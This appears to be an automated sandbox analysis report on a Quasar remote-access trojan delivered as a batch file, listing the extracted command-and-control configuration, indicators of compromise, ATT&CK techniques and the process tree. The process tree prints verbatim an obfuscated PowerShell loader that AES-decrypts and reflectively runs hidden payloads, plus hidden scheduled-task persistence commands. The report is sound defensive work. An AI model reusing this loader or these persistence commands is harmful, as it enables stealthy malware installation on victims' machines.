quasar | 5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46

Analysis

max time kernel
291s
max time network
259s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2024 15:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.bat
Size

1.9MB
MD5

44523454be47061f187cfdc2ec60834a
SHA1

86136762b9296ef6517bc01b7764e59398bab09b
SHA256

5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46
SHA512

4c5f35a45ff1cfc394e19bbf1e4080fd43ea2ef9880b16b6fc316c85dc7fbdb222d03821224b3eac90a971c8f69a05ac96d86f7367cad658cfb229bf5f966080
SSDEEP

24576:kxASqRPmTwkE+UrVuwEQ6/RZhDGYAiM37i9yfela6S2ZZoB+a7ZpFifK7+tLe61s:k+TEwl7Q865Zuimi7/E4mp7kScR0

Score

10^/10

quasar new execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

New

even-lemon.gl.at.ply.gg:33587

Mutex

2bce5514-d527-4787-825c-3042f9dd5ede

Attributes

encryption_key
501DB7A849356BF2C272A70D53FAF39F17D4245C
install_name
WinHost32.exe
log_directory
UpdateLogs
reconnect_delay
3000
startup_key
Powershell
subdirectory
System32

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/684-217-0x000001FA55AC0000-0x000001FA55DDE000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3196 powershell.exe
3872 powershell.exe
684 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

WinHost32.exe

pid process

5048 WinHost32.exe

pid	process
5048	WinHost32.exe

Drops file in System32 directory 11 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Powershell	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5084 schtasks.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings powershell.exe

pid	process
5084	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWinHost32.exe

pid	process
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
684	powershell.exe
5048	WinHost32.exe
5048	WinHost32.exe
5048	WinHost32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2272 wrote to memory of 4728	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 4728	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 3196	2272	cmd.exe	powershell.exe
PID 2272 wrote to memory of 3196	2272	cmd.exe	powershell.exe
PID 3196 wrote to memory of 3872	3196	powershell.exe	powershell.exe
PID 3196 wrote to memory of 3872	3196	powershell.exe	powershell.exe
PID 3196 wrote to memory of 3616	3196	powershell.exe	WScript.exe
PID 3196 wrote to memory of 3616	3196	powershell.exe	WScript.exe
PID 3616 wrote to memory of 1852	3616	WScript.exe	cmd.exe
PID 3616 wrote to memory of 1852	3616	WScript.exe	cmd.exe
PID 1852 wrote to memory of 4404	1852	cmd.exe	cmd.exe
PID 1852 wrote to memory of 4404	1852	cmd.exe	cmd.exe
PID 1852 wrote to memory of 684	1852	cmd.exe	powershell.exe
PID 1852 wrote to memory of 684	1852	cmd.exe	powershell.exe
PID 684 wrote to memory of 3144	684	powershell.exe	Explorer.EXE
PID 684 wrote to memory of 1968	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1064	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1568	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 372	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1552	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 4496	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 752	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 4688	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1336	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 820	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2504	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2700	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1320	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1712	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1704	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 716	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2684	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1500	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 908	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1300	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1888	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2668	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1876	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 4828	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1476	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1868	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1076	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2648	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 868	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1344	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2240	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1056	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2420	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 4576	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2604	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2400	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1088	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1608	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2392	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 2976	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1180	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 1188	684	powershell.exe	svchost.exe
PID 684 wrote to memory of 5084	684	powershell.exe	schtasks.exe
PID 684 wrote to memory of 5084	684	powershell.exe	schtasks.exe
PID 684 wrote to memory of 5048	684	powershell.exe	WinHost32.exe
PID 684 wrote to memory of 5048	684	powershell.exe	WinHost32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:716

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1180

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1188

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1968

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2668

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2976

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x6hdqcq6RQXKzI+eGl8CbwQw2wLZYw/QJkpI6zt6Pbk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YoKnI+WawYMIiLnyESSOGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FjMIz=New-Object System.IO.MemoryStream(,$param_var); $kYBsW=New-Object System.IO.MemoryStream; $uBkWK=New-Object System.IO.Compression.GZipStream($FjMIz, [IO.Compression.CompressionMode]::Decompress); $uBkWK.CopyTo($kYBsW); $uBkWK.Dispose(); $FjMIz.Dispose(); $kYBsW.Dispose(); $kYBsW.ToArray();}function execute_function($param_var,$param2_var){ $JrFjv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WDOAj=$JrFjv.EntryPoint; $WDOAj.Invoke($null, $param2_var);}$ycLaV = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $ycLaV;$oVuwF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ycLaV).Split([Environment]::NewLine);foreach ($UjVkN in $oVuwF) { if ($UjVkN.StartsWith('guNjsQMfaoHUnLlawqMv')) { $RczWa=$UjVkN.Substring(20); break; }}$payloads_var=[string[]]$RczWa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_261_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x6hdqcq6RQXKzI+eGl8CbwQw2wLZYw/QJkpI6zt6Pbk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YoKnI+WawYMIiLnyESSOGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FjMIz=New-Object System.IO.MemoryStream(,$param_var); $kYBsW=New-Object System.IO.MemoryStream; $uBkWK=New-Object System.IO.Compression.GZipStream($FjMIz, [IO.Compression.CompressionMode]::Decompress); $uBkWK.CopyTo($kYBsW); $uBkWK.Dispose(); $FjMIz.Dispose(); $kYBsW.Dispose(); $kYBsW.ToArray();}function execute_function($param_var,$param2_var){ $JrFjv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WDOAj=$JrFjv.EntryPoint; $WDOAj.Invoke($null, $param2_var);}$ycLaV = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.bat';$host.UI.RawUI.WindowTitle = $ycLaV;$oVuwF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ycLaV).Split([Environment]::NewLine);foreach ($UjVkN in $oVuwF) { if ($UjVkN.StartsWith('guNjsQMfaoHUnLlawqMv')) { $RczWa=$UjVkN.Substring(20); break; }}$payloads_var=[string[]]$RczWa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:4404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:5084

C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe
"C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5048

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
f6fe1363ae08aa10835d64f416074f2a

SHA1
dd402e9baca03da34e480610d45cd774fcf6f05b

SHA256
d18e43d2d5465d99953670c4779838cca2b6bd1e21730aacf1e81deacbe62eb3

SHA512
c499735a6cd49bfd31b7925288f0a2429f479b3b1e4a4acbd0b82255eb3b1f8f1c317384917cf69423a7bafef9ba9980638186858e7f5223a61fdebb95a40f2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okauepon.qum.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.bat

Filesize
1.9MB

MD5
44523454be47061f187cfdc2ec60834a

SHA1
86136762b9296ef6517bc01b7764e59398bab09b

SHA256
5a88206b2a68e2c0175d091b3a0c7b133a1b35740b4acc33f5aaebe23fc97e46

SHA512
4c5f35a45ff1cfc394e19bbf1e4080fd43ea2ef9880b16b6fc316c85dc7fbdb222d03821224b3eac90a971c8f69a05ac96d86f7367cad658cfb229bf5f966080

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_261.vbs

Filesize
124B

MD5
ae8b10a3b0eb28cc61106f91b426aeaa

SHA1
a3749d3caea598bed6c9e79a1d6cf6fe02c5805c

SHA256
92754274fa503c0fe69eee3f4f0ca0124887e15932844c53585a44bf7086dc8b

SHA512
82561215a8c904b4b2352f1470d461d0888d2c904a51aa8661235810d077bc27c18179a24eb9b2c4617f3eb900143ce6746701b224546cb73be6c2a1617393b2

Download Submit
C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/684-217-0x000001FA55AC0000-0x000001FA55DDE000-memory.dmp

Filesize
3.1MB

Download
memory/716-226-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/820-232-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/868-222-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/908-234-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/1056-229-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/1064-230-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
memory/1076-219-0x00007FFB1B5E0000-0x00007FFB1B5F0000-memory.dmp

Filesize
64KB

Download
